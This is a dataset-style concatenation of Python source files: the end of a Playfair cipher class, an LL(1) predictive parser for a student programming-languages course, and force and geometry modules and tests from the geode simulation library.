self.alfabeto_no_presente = ['i/j' if x == 'i' else x for lst in self.alfabeto_no_presente for x in lst]
self.key_without_repetition = ['i/j' if x == 'i' else x for lst in self.key_without_repetition for x in lst]
tmp_list = np.array(self.key_without_repetition[:tam_list] + self.alfabeto_no_presente[:(25 - tam_list)])
self.square = np.reshape(tmp_list, (5, 5))
def cipher_decipher(self):
new_msg = ""
if(self.action==0):
for index in range(0, len(self.message), 2):
if (self.dict_col[self.message[index]] == self.dict_col[self.message[index + 1]]):
new_msg += self.square[(self.dict_row[self.message[index]] + 1) % 5][self.dict_col[self.message[index]]]
new_msg += self.square[(self.dict_row[self.message[index + 1]] + 1) % 5][
self.dict_col[self.message[index + 1]]]
elif (self.dict_row[self.message[index]] == self.dict_row[self.message[index + 1]]):
new_msg += self.square[self.dict_row[self.message[index]]][(self.dict_col[self.message[index]] + 1) % 5]
new_msg += self.square[self.dict_row[self.message[index + 1]]][
(self.dict_col[self.message[index + 1]] + 1) % 5]
else:
new_msg += self.square[self.dict_row[self.message[index]]][self.dict_col[self.message[index + 1]]]
new_msg += self.square[self.dict_row[self.message[index + 1]]][self.dict_col[self.message[index]]]
return new_msg
elif(self.action==1):
new_msg = ""
for index in range(0, len(self.message), 2):
if (self.dict_col[self.message[index]] == self.dict_col[self.message[index + 1]]):
new_msg += self.square[(self.dict_row[self.message[index]] - 1) % 5][self.dict_col[self.message[index]]]
new_msg += self.square[(self.dict_row[self.message[index + 1]] - 1) % 5][
self.dict_col[self.message[index + 1]]]
elif (self.dict_row[self.message[index]] == self.dict_row[self.message[index + 1]]):
new_msg += self.square[self.dict_row[self.message[index]]][(self.dict_col[self.message[index]] - 1) % 5]
new_msg += self.square[self.dict_row[self.message[index + 1]]][
(self.dict_col[self.message[index + 1]] - 1) % 5]
else:
new_msg += self.square[self.dict_row[self.message[index]]][self.dict_col[self.message[index + 1]]]
new_msg += self.square[self.dict_row[self.message[index + 1]]][self.dict_col[self.message[index]]]
for i in range(0, int(len(new_msg) / 2) - 1, 2):
if new_msg[i] == new_msg[i + 2]:
new_msg = new_msg[:i + 1] + new_msg[i + 2:]
if (new_msg[-1] == "x"):
new_msg = new_msg[:-1]
return new_msg
else:
raise Exception("Use 0 to Cypher and 1 to Decipher")
def main():
message = "THIS SECRET MESSAGE IS ENCRYPTED"
key = "yoan pinzon"
print("Message to Cypher: ", message)
to_cipher = PlayFair(message, key, 0)
to_cipher.init_square()
print("Square Key:")
print(to_cipher.square)
ciphered_message = to_cipher.cipher_decipher()
print("Message Encrypted: " + ciphered_message)
print()
print("Message to Decipher: ", ciphered_message)
to_decipher = PlayFair(ciphered_message, key, 1)
to_decipher.init_square()
print("Square Key:")
print(to_decipher.square)
print("Message Encrypted: " + to_decipher.cipher_decipher())
if __name__ == '__main__':
main()
``` |
{
"source": "jjpulidos/Programming-Languages-2020",
"score": 3
} |
#### File: jjpulidos/Programming-Languages-2020/mainSyntax.py
```python
from mainLexer import Lexer
flagSintaxis = False
token = ""
i = 0
j = 0
recursive_calls = []
dict_tk_conversion = {
"tk_suma": "+",
"tk_multiplicacion": "*",
"tk_modulo": "%",
"tk_par_izq": "(",
"tk_par_der": ")",
"tk_punto": ".",
"tk_coma": ",",
"tk_dos_puntos": ":",
"tk_corch_izq": "[",
"tk_corch_der": "]",
"tk_llave_izq": "{",
"tk_llave_der": "}",
"tk_diferente": "!=",
"tk_division": "//",
"tk_ejecuta": "->",
"tk_menor_igual": "<=",
"tk_mayor_igual": ">=",
"tk_igual": "==",
"tk_asig": "=",
"tk_menor": "<",
"tk_mayor": ">",
"tk_numero": "número",
"tk_cadena": "string",
"tk_menos": "-"
}
initial_symbol_grammar = "program"
not_terminals = ["program", "tipo", "declaracion",
"literal", "expr", "expr_aux", "expr_p2", "expr_p2_aux", "expr_p3", "expr_p3_aux", "expr_p4",
"cexpr", "cexpr_aux", "bin_op_log", "cexpr_p6", "cexpr_p6_aux", "bin_op_p6",
"cexpr_p7", "cexpr_p7_aux", "bin_op_p7", "cexpr_p8", "cexpr_p9", "cexpr_p9_aux", "cexpr_p10",
"cexpr_p10_aux", "expr_list_no_req", "expr_list_0_more", 'asignacion', 'asignacion_fc_nta',
'salida_aux', 'id_fc_aux', 'no_terminal_aux', 'operators', 'tk_corch_izq_fc',
'global_declaracion', 'nonlocal_declaracion', 'declaracion_asignacion_fc', 'print_statement',
'conditional_statement_1', 'conditional_statement_2', 'conditional_statement_3',
'statement', 'conditional_block', 'newline1_fc', 'newline2_fc', "expr_list_no_req_cor",
'loop_block', 'block_sin_epsilon', 'block_con_epsilon', 'identaciones_bse',"expr_list_0_more_cor",
'function_block', 'coma_fc', 'block_0o1', 'argumentos_star', 'argumentos_0o1',
'return_aux',"function_fc","return_0o1","ejecucion","return_statement","fc_return","class_block",
"id_object","dedent_0o1"
]
grammar = {
"tipo": [["int"], ["str"], ["bool"], ["object"], ["tk_corch_izq", "tipo", "tk_corch_der"],["tk_cadena"]],
"declaracion": [['tk_dos_puntos', 'tipo', 'tk_asig', 'expr']],
'asignacion': [
['asignacion_fc_nta']
],
'asignacion_fc_nta': [
['tk_asig', 'salida_aux'],
['tk_corch_izq', 'expr', 'tk_corch_der', 'tk_corch_izq_fc'],
['tk_punto', 'id', 'tk_asig', 'salida_aux'],
['']
],
'tk_corch_izq_fc': [['tk_asig', 'salida_aux'],
['']
],
'salida_aux': [
['id', 'id_fc_aux'],
['expr']
],
'id_fc_aux': [
['asignacion'],
['operators', 'expr'],
],
'no_terminal_aux': [
['tk_asig'],
['tk_corch_izq'],
['tk_punto'],
['']
],
'operators': [
['tk_suma'],
['tk_menos'],
['tk_multiplicacion'],
['tk_division'],
['tk_modulo'],
['tk_igual'],
['tk_diferente'],
['tk_menor_igual'],
['tk_mayor_igual'],
['tk_menor'],
['tk_mayor'],
['is'],
['or'],
['and'],
['if', 'expr', 'else', 'expr']
],
'global_declaracion': [
['global', 'id']
],
'nonlocal_declaracion': [
['nonlocal', 'id']
],
'declaracion_asignacion_fc': [
['declaracion'],
['asignacion'],
["ejecucion"]
],
"ejecucion":[
["tk_par_izq","expr_list_no_req","tk_par_der"]
],
'print_statement': [
['print', 'tk_par_izq', 'expr', 'tk_par_der']
],
'return_statement': [
["return","fc_return"]
],
"fc_return":[
["expr"],
[""]
],
'conditional_statement_1': [
['if', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', "dedent_0o1", 'newline1_fc']
],
'newline1_fc': [
['DEDENT'],
['']
],
'conditional_statement_2': [
['elif', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', 'newline2_fc'],
["conditional_statement_3"],
["loop_block"]
],
'newline2_fc': [
['NEWLINE', 'DEDENT'],
['DEDENT']
],
'conditional_statement_3': [
['else', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon', "newline1_fc"],
['']
],
'statement': [
['print_statement'],
["return_statement"],
['id', 'declaracion_asignacion_fc'],
["self", "tk_punto", "id",'declaracion_asignacion_fc'],
['global_declaracion'],
['nonlocal_declaracion'],
['pass']
],
'conditional_block': [
['conditional_statement_1','conditional_statement_2']
],
'loop_block': [
['while', 'expr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon'],
['for', 'id', 'in', 'cexpr', 'tk_dos_puntos', 'NEWLINE', 'INDENT', 'block_sin_epsilon']
],
'function_block': [
["def", "id", "tk_par_izq", "argumentos_0o1", "tk_par_der", "tk_ejecuta", "tipo", "tk_dos_puntos",
"NEWLINE", "INDENT", "function_fc"],
],
"function_fc":[
["return", "return_aux", "newline1_fc"],
["block_sin_epsilon","return_0o1"]
],
"class_block":[
["class","id","tk_par_izq","id_object","tk_par_der" ,"tk_dos_puntos", "NEWLINE", "INDENT","block_sin_epsilon"]
],
"id_object":[
["id"],
["object"]
],
"return_0o1":[
["return", "return_aux"],
[""]
],
'argumentos_0o1': [
["coma_fc"],
[""]
],
'argumentos_star': [
["tk_coma", "coma_fc"],
[""]
],
'coma_fc': [
["id", "tk_dos_puntos", "tipo", "argumentos_star"],
["self", "tk_dos_puntos", "tipo", "argumentos_star"],
],
'block_0o1': [
["block_sin_epsilon", "NEWLINE"],
[""]
],
'return_aux': [
["expr"],
[""]
],
'identaciones_bse': [
['NEWLINE',"dedent_0o1"],
['DEDENT'],
['']
],
"dedent_0o1":[
["DEDENT"],
[""]
],
'block_sin_epsilon': [
['conditional_block', 'identaciones_bse', 'block_con_epsilon'],
['statement', 'identaciones_bse', 'block_con_epsilon'],
['loop_block', 'identaciones_bse', 'block_con_epsilon'],
["function_block", 'identaciones_bse', 'block_con_epsilon'],
["class_block", 'identaciones_bse', 'block_con_epsilon']
]
, 'block_con_epsilon': [
['conditional_block', 'identaciones_bse', 'block_con_epsilon'],
['statement', 'identaciones_bse', 'block_con_epsilon'],
['loop_block', 'identaciones_bse', 'block_con_epsilon'],
["function_block", 'identaciones_bse', 'block_con_epsilon'],
["class_block", 'identaciones_bse', 'block_con_epsilon'],
[""]
],
'program': [
['block_con_epsilon']
],
"literal": [["None"], ["True"], ["False"], ["tk_numero"], ["tk_cadena"]],
"expr": [["expr_p2", "expr_aux"]],
"expr_aux": [["if", "expr", "else", "expr_p2", "expr_aux"], [""]],
"expr_p2": [["expr_p3", "expr_p2_aux"]],
"expr_p2_aux": [["or", "expr_p3", "expr_p2_aux"], [""]],
"expr_p3": [["expr_p4", "expr_p3_aux"]],
"expr_p3_aux": [["and", "expr_p4", "expr_p3_aux"], [""]],
"expr_p4": [["not", "expr_p4"], ["cexpr"]],
"cexpr": [["cexpr_p6", "cexpr_aux"]],
"cexpr_aux": [["bin_op_log", "cexpr_p6", "cexpr_aux"], [""]],
"bin_op_log": [["tk_igual"], ["tk_diferente"], ["tk_mayor"], ["tk_menor"], ["tk_mayor_igual"], ["tk_menor_igual"],
["is"]],
"cexpr_p6": [["cexpr_p7", "cexpr_p6_aux"]],
"cexpr_p6_aux": [["bin_op_p6", "cexpr_p7", "cexpr_p6_aux"], [""]],
"bin_op_p6": [["tk_suma"], ["tk_menos"]],
"cexpr_p7": [["cexpr_p8", "cexpr_p7_aux"]],
"cexpr_p7_aux": [["bin_op_p7", "cexpr_p8", "cexpr_p7_aux"], [""]],
"bin_op_p7": [["tk_multiplicacion"], ["tk_division"], ["tk_modulo"]],
"cexpr_p8": [["tk_menos", "cexpr_p8"], ["cexpr_p9"]],
"cexpr_p9": [["cexpr_p10", "cexpr_p9_aux"]],
"cexpr_p9_aux": [["tk_punto", "id", "cexpr_p10_aux", "cexpr_p9_aux"],
["tk_corch_izq", "expr", "tk_corch_der", "cexpr_p9_aux"], [""]],
"expr_list_no_req_cor":[["expr", "expr_list_0_more_cor"], [""]],
"expr_list_0_more_cor": [["tk_coma", "expr", "expr_list_0_more_cor"], [""]],
"cexpr_p10": [["id", "cexpr_p10_aux"], ["literal"], ["tk_corch_izq", "expr_list_no_req_cor", "tk_corch_der"],
["tk_par_izq", "expr", "tk_par_der"], ["len", "tk_par_izq", "cexpr", "tk_par_der"],["self"]],
"cexpr_p10_aux": [["tk_par_izq", "expr_list_no_req", "tk_par_der"], [""]],
"expr_list_no_req": [["expr", "expr_list_0_more"], [""]],
"expr_list_0_more": [["tk_coma", "expr", "expr_list_0_more"], [""]]
}
pred_rules = {}
for k in grammar.keys():
pred_rules[k] = []
def log(s, debug=0):
if debug:
print(s)
def PRIMEROS(alpha, debug=0):
alpha = [alpha] if type(alpha) is str else alpha
set_primeros = set()
if alpha[0] == "": # 1. Si alpha == epsilon
set_primeros = set_primeros.union([""])
return set_primeros
if alpha[0] not in not_terminals: # 2a. a_1 es un terminal
set_primeros = set_primeros.union([alpha[0]])
return set_primeros
else:
if alpha[0] != alpha[0]:
set_primeros = set_primeros.union(PRIMEROS(alpha[0], debug))
if "" in set_primeros:
if len(alpha) == 1:
pass
else:
try:
set_primeros.remove("")
except KeyError:
pass
set_primeros = set_primeros.union(PRIMEROS(alpha[1:], debug))
return set_primeros
else:
# log("alpha[0] != alpha", debug)
for regla in grammar[alpha[0]]:
set_primeros = set_primeros.union(PRIMEROS(regla, debug))
log("Después de Revisar las Reglas de " + alpha[0] + " Se encontró que sus PRIMEROS son: " + str(
set_primeros), debug)
pass
return set_primeros
def SIGUIENTES(no_terminal):
global recursive_calls
set_siguientes = set()
if no_terminal == initial_symbol_grammar:
set_siguientes = set_siguientes.union(set("$"))
for nt, rules in grammar.items():
for rule in rules:
try:
index = rule.index(no_terminal)
if index == len(rule) - 1:
beta = ""
else:
beta = rule[index + 1:]
if type(beta) == str:
beta = [beta]
primeros_beta = PRIMEROS(beta)
set_siguientes = set_siguientes.union(primeros_beta)
set_siguientes.remove("")
if "" in primeros_beta or beta == "":
if nt not in recursive_calls:
recursive_calls.append(no_terminal)
set_siguientes = set_siguientes.union(SIGUIENTES(nt))
except ValueError:
pass
except KeyError:
pass
return set_siguientes
def PRED(no_terminal):
for rule in grammar[no_terminal]:
set_prediccion = set()
primeros_alpha = PRIMEROS(rule)
if "" in primeros_alpha:
set_prediccion = set_prediccion.union(primeros_alpha)
set_prediccion.remove("")
followings = SIGUIENTES(no_terminal)
set_prediccion = set_prediccion.union(followings)
else:
set_prediccion = set_prediccion.union(primeros_alpha)
lst_tmp = []
for i in set_prediccion:
lst_tmp.append(i)
pred_rules[no_terminal].append(lst_tmp)
def emparejar(token, token_esperado, lexer):
global i, j
# Emparejar No Terminales
if token == token_esperado:
token, i, j = lexer.getNextToken(i, j)
else:
errorSintaxis([[token_esperado]])
return token, i, j
def errorSintaxis(lista_tokens_Esperados):
global token, i, j, flagSintaxis
flagSintaxis = True
if i==-2 and j ==-2:
return
str_tmp = ""
for pred in lista_tokens_Esperados:
for token_esperado in pred:
try:
str_tmp += "'" + dict_tk_conversion[token_esperado] + "', "
except KeyError:
str_tmp += "'" + token_esperado + "', "
token_found = str(token[0])
try:
token_found = dict_tk_conversion[str(token[0])]
except KeyError:
pass
# tokens_expected = []
# for i in str_tmp[:-2].split(", "):
# try:
# tokens_expected.append(dict_tk_conversion[i])
# except KeyError:
# tokens_expected.append(i)
# print(tokens_expected)
print(
"<" + str(i+1) + "," + str(j) + ">" + " Error sintactico: se encontró: '" + token_found + "' y se esperaba " + str(
str_tmp[:-2]) + ".")
def nonTerminal(N, lexer):
global token, i, j
for idx, pd in enumerate(pred_rules[N]):
if flagSintaxis:
return
if token[0] in pd:
for symbol in grammar[N][idx]:
if flagSintaxis:
return
if symbol in not_terminals:
nonTerminal(symbol, lexer)
if flagSintaxis:
return
elif symbol == "":
if flagSintaxis:
return
else:
token, i, j = emparejar(token[0], symbol, lexer)
if i == -1 and j == -1: # Fin de archivo
token = ("$", i, j)
if i == -2 and j == -2: # Error lexico
flagSintaxis==True
if flagSintaxis:
return
return
tokensEsperados=[]
for k in pred_rules[N]:
tokensEsperados.append(k)
errorSintaxis(tokensEsperados)
return
def main():
global token, i, j, recursive_calls
for nt in not_terminals:
recursive_calls = []
PRED(nt)
lexer = Lexer("test.py")
with open("output.txt", "w") as file:
token, i, j = lexer.getNextToken(i, j)
nonTerminal(initial_symbol_grammar, lexer)
if not flagSintaxis:
if token[0] == '$':
print("El analisis sintactico ha finalizado exitosamente.")
else:
errorSintaxis(["No se esperaba este token"])
# print(token)
if __name__ == '__main__':
main()
``` |
{
"source": "jjqcat/geode",
"score": 2
} |
#### File: geode/force/__init__.py
```python
from __future__ import division,absolute_import
from geode import *
def edge_springs(mesh,mass,X,stiffness,damping_ratio):
return Springs(mesh.segment_soup().elements,mass,X,stiffness,damping_ratio)
def bending_springs(mesh,mass,X,stiffness,damping_ratio):
springs = ascontiguousarray(mesh.bending_quadruples()[:,(0,3)])
return Springs(springs,mass,X,stiffness,damping_ratio)
StrainMeasure = {2:StrainMeasure2d,3:StrainMeasure3d}
FiniteVolume = {(2,2):FiniteVolume2d,(3,2):FiniteVolumeS3d,(3,3):FiniteVolume3d}
LinearFiniteVolume = {(2,2):LinearFiniteVolume2d,(3,2):LinearFiniteVolumeS3d,(3,3):LinearFiniteVolume3d}
def finite_volume(mesh,density,X,model,m=None,plasticity=None,verbose=True):
elements = mesh.elements if isinstance(mesh,Object) else asarray(mesh,dtype=int32)
mx,d = asarray(X).shape[1],elements.shape[1]-1
if m is None:
m = mx
strain = StrainMeasure[d](elements,X)
if verbose:
strain.print_altitude_statistics()
if isinstance(model,dict):
model = model[d]
return FiniteVolume[m,d](strain,density,model,plasticity)
def linear_finite_volume(mesh,X,density,youngs_modulus=3e6,poissons_ratio=.4,rayleigh_coefficient=.05):
elements = mesh.elements if isinstance(mesh,Object) else asarray(mesh,dtype=int32)
m,d = asarray(X).shape[1],elements.shape[1]-1
if d==7:
return LinearFiniteVolumeHex(StrainMeasureHex(elements,X),density,youngs_modulus,poissons_ratio,rayleigh_coefficient)
else:
return LinearFiniteVolume[m,d](elements,X,density,youngs_modulus,poissons_ratio,rayleigh_coefficient)
def neo_hookean(youngs_modulus=3e6,poissons_ratio=.475,rayleigh_coefficient=.05,failure_threshold=.25):
return {2:NeoHookean2d(youngs_modulus,poissons_ratio,rayleigh_coefficient,failure_threshold),
3:NeoHookean3d(youngs_modulus,poissons_ratio,rayleigh_coefficient,failure_threshold)}
def simple_shell(mesh,density,Dm=None,X=None,stretch=(0,0),shear=0):
mesh = mesh if isinstance(mesh,Object) else TriangleSoup(asarray(mesh,dtype=int32))
if Dm is None:
X = asarray(X)
assert X.ndim==2 and X.shape[1]==2, 'Expected 2D rest state'
tris = mesh.elements
Dm = X[tris[:,1:]].swapaxes(1,2)-X[tris[:,0]].reshape(-1,2,1)
else:
assert X is None
shell = SimpleShell(mesh,ascontiguousarray(Dm),density)
shell.stretch_stiffness = stretch
shell.shear_stiffness = shear
return shell
LinearBendingElements = {2:LinearBendingElements2d,3:LinearBendingElements3d}
def linear_bending_elements(mesh,X,stiffness,damping):
X = asarray(X)
bend = LinearBendingElements[X.shape[1]](mesh,X)
bend.stiffness = stiffness
bend.damping = damping
return bend
CubicHinges = {2:CubicHinges2d,3:CubicHinges3d}
def cubic_hinges(mesh,X,stiffness,damping,angles=None):
bends = mesh.bending_tuples()
X = asarray(X)
Hinges = CubicHinges[X.shape[1]]
if angles is None:
angles = Hinges.angles(bends,X)
hinges = CubicHinges[X.shape[1]](bends,angles,X)
hinges.stiffness = stiffness
hinges.damping = damping
return hinges
BindingSprings = {2:BindingSprings2d,3:BindingSprings3d}
def binding_springs(nodes,parents,weights,mass,stiffness,damping_ratio):
parents = asarray(parents,dtype=int32)
return BindingSprings[parents.shape[1]](nodes,parents,weights,mass,stiffness,damping_ratio)
particle_binding_springs = ParticleBindingSprings
edge_binding_springs = BindingSprings2d
face_binding_springs = BindingSprings3d
```
#### File: geode/force/test_force.py
```python
from __future__ import absolute_import
from numpy import *
from geode import real
from geode.force import *
from geode.force.force_test import *
from geode.geometry.platonic import *
def test_gravity():
random.seed(12871)
X = random.randn(1,3)
gravity = Gravity([1])
force_test(gravity,X,verbose=1)
def test_ether_drag():
random.seed(12871)
X = random.randn(1,3)
drag = EtherDrag([1.2],7)
force_test(drag,X,verbose=1)
def test_springs():
random.seed(12871)
X0 = random.randn(2,3)
X = random.randn(2,3)
springs = Springs([[0,1]],[1.1,1.2],X0,5,7)
force_test(springs,X,verbose=1)
springs = Springs([[0,1]],[1.1,1.2],X0,[5],[7])
force_test(springs,X,verbose=1)
def test_fvm_2d():
random.seed(12872)
model = neo_hookean()
X = random.randn(3,2)
dX = .1*random.randn(3,2)
fvm = finite_volume([(0,1,2)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_fvm_s3d():
random.seed(12872)
model = neo_hookean()
X = random.randn(3,3)
dX = .1*random.randn(3,3)
fvm = finite_volume([(0,1,2)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_fvm_3d():
random.seed(12873)
model = neo_hookean()
X = random.randn(4,3)
dX = .1*random.randn(4,3)
fvm = finite_volume([(0,1,2,3)],1000,X,model)
force_test(fvm,X+dX,verbose=1)
def test_simple_shell():
for i in 0,1,3,4,7:
print '\ni = %d'%i
random.seed(12872+i)
X = random.randn(3,2)
X2 = .1*random.randn(3,3)
X2[:,:2] += X
shell = simple_shell([(0,1,2)],1000,X=X,stretch=(7,6),shear=3)
shell.F_threshold = 1e-7
force_test(shell,X2,verbose=1)
def test_bending():
random.seed(7218414)
stiffness = 7
damping = 3
for d in 2,3:
mesh = SegmentSoup([[0,1],[1,2]]) if d==2 else TriangleSoup([[0,2,1],[1,2,3]])
X = random.randn(d+1,d)
dX = .1*random.randn(d+1,d)
for bend in linear_bending_elements(mesh,X,stiffness,damping),cubic_hinges(mesh,X,stiffness,damping):
print '\n',type(bend).__name__
if 'CubicHinges' in type(bend).__name__: # Compare energy with slow_energy
angles = bend.angles(mesh.bending_tuples(),X)
for theta in random.randn(20):
iX = concatenate([X[:-1],[X[1]+(Rotation.from_angle(theta) if d==2 else Rotation.from_angle_axis(theta,X[2]-X[1]))*(X[-1]-X[1])]])
bend.update_position(iX,False)
energy = bend.elastic_energy()
slow_energy = bend.slow_elastic_energy(angles,X,iX)
error = relative_error(energy,slow_energy)
print 'slow energy error = %g (slow %g vs. %g, theta = %g)'%(error,slow_energy,energy,theta)
assert error<1e-8
force_test(bend,X+dX,verbose=1)
# Test against exact sphere energies. We don't actually compute the correct answers in 3D, since hinge based energies are fundamentally mesh dependent.
radius = 78
analytics = [('S_1',circle_mesh(1000,radius=radius),pi/radius,1,1e-5),
('S_2',sphere_mesh(3,radius=radius),2*pi,4,.015),
('S_1 x [0,e]',open_cylinder_mesh((0,0,0),(0,0,e),radius=radius,na=100),pi*e/radius,3,2e-4)]
for name,(mesh,X),known,fudge,tolerance in analytics:
flat = zeros(len(mesh.bending_tuples()))
bend = cubic_hinges(mesh,X,stiffness,damping,angles=flat)
energy = bend.slow_elastic_energy(flat,X,X)/stiffness/fudge
error = relative_error(energy,known)
print '%s: known %g, energy %g, ratio %r, error %g'%(name,known,energy,energy/known,error)
assert error<tolerance
def test_linear_fvm_2d():
random.seed(12872)
X = random.randn(3,2)
dX = .1*random.randn(3,2)
fvm = linear_finite_volume([(0,1,2)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_s3d():
random.seed(12872)
X = random.randn(3,3)
dX = .1*random.randn(3,3)
fvm = linear_finite_volume([(0,1,2)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_3d():
random.seed(12873)
X = random.randn(4,3)
dX = .1*random.randn(4,3)
fvm = linear_finite_volume([(0,1,2,3)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_linear_fvm_hex():
random.seed(12873)
X = [[0,0,0],[0,0,1],[0,1,0],[0,1,1],[1,0,0],[1,0,1],[1,1,0],[1,1,1]]+.1*random.randn(8,3)
dX = .1*random.randn(8,3)
fvm = linear_finite_volume([arange(8)],X,1000)
force_test(fvm,X+dX,verbose=1)
def test_air_pressure():
random.seed(2813)
mesh,X = icosahedron_mesh()
if 1:
X = vstack([random.randn(3),X,random.randn(3)])
mesh = TriangleSoup(mesh.elements+1)
X2 = X + random.randn(*X.shape)/10
for closed in 0,1:
for side in 1,-1:
print '\nclosed %d, side %d'%(closed,side)
air = AirPressure(mesh,X,closed,side)
force_test(air,X2,verbose=1)
def test_pins():
random.seed(17310)
X = random.randn(5,3)
nodes = [1,3]
mass = random.randn(len(X))**2
targets = random.randn(len(nodes),3)
pins = Pins(nodes,mass,targets,3.5,1.1)
force_test(pins,X,verbose=1)
def test_axis_pins():
random.seed(17310)
X = random.randn(5,3)
nodes = [1,3]
mass = random.randn(len(X))**2
targets = random.randn(len(nodes),3)
pins = AxisPins(nodes,mass,targets,3.5,1.1)
pins.axis = (2,3,4)
force_test(pins,X,verbose=1)
def test_surface_pins():
random.seed(127130)
# Test a sphere mesh ignoring errors in the Hessian
target_mesh,target_X = sphere_mesh(0)
X = random.randn(100,3)
mass = absolute(random.randn(len(X)))
nodes = unique(random.randint(len(X),size=50).astype(int32))
pins = SurfacePins(nodes,mass,target_mesh,target_X,7,1.1)
force_test(pins,X,verbose=1,ignore_hessian=1)
# Hessian should be correct if the closest points are all on faces
target_mesh = TriangleSoup([[0,1,2]])
target_X = 100*eye(3)
pins = SurfacePins(nodes,mass,target_mesh,target_X,7,1.1)
force_test(pins,X,verbose=1)
def test_binding_springs():
random.seed(73210)
for k in 2,3:
nodes = [1,2]
X = random.randn(20,3)
parents = {2:[[5,6],[8,9]],
3:[[5,6,7],[10,11,12]]}[k]
weights = random.uniform(1,2,(2,k))
weights /= weights.sum(axis=1).reshape(-1,1)
mass = absolute(random.randn(len(X)))
springs = binding_springs(nodes,parents,weights,mass,7,1.2)
force_test(springs,X,verbose=1)
def test_particle_binding_springs():
random.seed(73210)
X = random.randn(4,3)
mass = absolute(random.randn(len(X)))
springs = particle_binding_springs([[1,2]],mass,7,1.2)
force_test(springs,X,verbose=1)
if __name__=='__main__':
test_simple_shell()
```
#### File: geode/geometry/__init__.py
```python
from __future__ import (division,absolute_import)
from geode import *
from numpy import asarray
BoxTrees = {2:BoxTree2d,3:BoxTree3d}
def BoxTree(X,leaf_size):
X = asarray(X)
return BoxTrees[X.shape[1]](X,leaf_size)
ParticleTrees = {2:ParticleTree2d,3:ParticleTree3d}
def ParticleTree(X,leaf_size=1):
X = asarray(X)
return ParticleTrees[X.shape[1]](X,leaf_size)
SimplexTrees = {(2,1):SegmentTree2d,(3,1):SegmentTree3d,(2,2):TriangleTree2d,(3,2):TriangleTree3d}
def SimplexTree(mesh,X,leaf_size=1):
X = asarray(X)
return SimplexTrees[X.shape[1],mesh.d](mesh,X,leaf_size)
Boxes = {1:Box1d,2:Box2d,3:Box3d}
def Box(min,max):
try:
d = len(min)
except TypeError:
d = len(max)
return Boxes[d](min,max)
Spheres = {2:Sphere2d,3:Sphere3d}
def Sphere(center,radius):
center = asarray(center)
return Spheres[len(center)](center,radius)
Capsules = {2:Capsule2d,3:Capsule3d}
def Capsule(x0,x1,radius):
try:
d = len(x0)
except TypeError:
d = len(x1)
return Capsules[d](x0,x1,radius)
empty_boxes = {1:empty_box_1d,2:empty_box_2d,3:empty_box_3d}
def empty_box(d):
return empty_boxes[d]()
FrameImplicits = {2:FrameImplicit2d,3:FrameImplicit3d}
def FrameImplicit(frame,object):
return FrameImplicits[object.d](frame,object)
surface_levelsets = {1:surface_levelset_c3d,2:surface_levelset_s3d}
def surface_levelset(particles,surface,max_distance=inf,compute_signs=True):
return surface_levelsets[surface.d](particles,surface,max_distance,compute_signs)
```
#### File: geode/geometry/test_box_tree.py
```python
from __future__ import division
from geode import *
from geode.geometry.platonic import *
def test_box_tree():
random.seed(10098331)
for n in 0,1,35,99,100,101,199,200,201:
print
x = random.randn(n,3).astype(real)
tree = BoxTree(x,10)
tree.check(x)
def test_particle_tree():
random.seed(10098331)
for n in 0,1,35,99,100,101,199,200,201:
print
X = random.randn(n,3).astype(real)
tree = ParticleTree(X,10)
tree.check(X)
X[:] = random.randn(n,3).astype(real)
tree.update()
tree.check(X)
def test_simplex_tree():
mesh,X = sphere_mesh(4)
tree = SimplexTree(mesh,X,4)
rays = 1000
hits = ray_traversal_test(tree,rays,1e-6)
print 'rays = %d, hits = %d'%(rays,hits)
assert hits==642
if __name__=='__main__':
test_simplex_tree()
```
#### File: geode/geometry/test_offset.py
```python
from __future__ import division
from geode.geometry.platonic import *
from geode.vector import *
def test_offset():
random.seed(8123171)
offset = .1
alpha = 1/4
small = 1e-8
def single():
return TriangleSoup([(0,1,2)]),[(0,0,0),(1,0,0),(0,1,0)]
for name,(m,X) in ('single',single()),('tet',tetrahedron_mesh()),('cube',cube_mesh()),('ico',icosahedron_mesh()):
for i in xrange(10):
# Generate a random affine transform, and make it rather singular
if i:
A = random.randn(3,3)
for _ in xrange(2):
A = dot(A,A)
A *= linalg.det(A)**(-1/3)
AX = Matrix(A)*X
else:
AX = asarray(X,dtype=float)
for shell in 0,1:
top = TriangleTopology(m)
if not shell and top.has_boundary():
continue
print('%s : %s'%(name,('volume','shell')[shell]))
# Perform offset
om,oX = (rough_offset_shell if shell else rough_offset_mesh)(top,AX,offset)
assert om.is_manifold()
# Verify that random points on the surface have nice distances
ns = 100
w = random.rand(ns,3)
w /= w.sum(axis=-1)[:,None]
sX = (w[:,:,None]*oX[om.elements()[random.randint(0,om.n_faces,size=ns)]]).sum(axis=1)
phi,_,_,_ = surface_levelset(ParticleTree(sX),SimplexTree(m,AX),inf,not shell)
assert all(alpha*offset <= phi+small)
assert all(phi <= offset+small)
if __name__=='__main__':
test_offset()
```
#### File: geode/geometry/test_platonic.py
```python
from __future__ import division
from geode.geometry.platonic import *
from geode.vector import *
def test_octahedron():
mesh,X = octahedron_mesh()
assert mesh.nodes()==len(X)
assert relative_error(mesh.volume(X),4/3) < 1e-10
assert not len(mesh.nonmanifold_nodes(0))
def test_icosahedron():
mesh,X = icosahedron_mesh()
a = 2 # see http://en.wikipedia.org/wiki/Icosahedron
assert relative_error(mesh.surface_area(X),5*sqrt(3)*a**2) < 1e-5
assert relative_error(mesh.volume(X),5/12*(3+sqrt(5))*a**3) < 1e-5
sphere = sphere_mesh(3)
def test_tetrahedron():
mesh,X = tetrahedron_mesh()
a = sqrt(8) # see http://en.wikipedia.org/wiki/Tetrahedron
assert relative_error(mesh.surface_area(X),sqrt(3)*a**2) < 1e-5
print mesh.volume(X),sqrt(2)/12*a**3
assert relative_error(mesh.volume(X),sqrt(2)/12*a**3) < 1e-5
def test_sphere():
mesh,X = sphere_mesh(4)
assert relative_error(magnitudes(X),1)<1e-7
centers = normalized(X[mesh.elements].mean(axis=1))
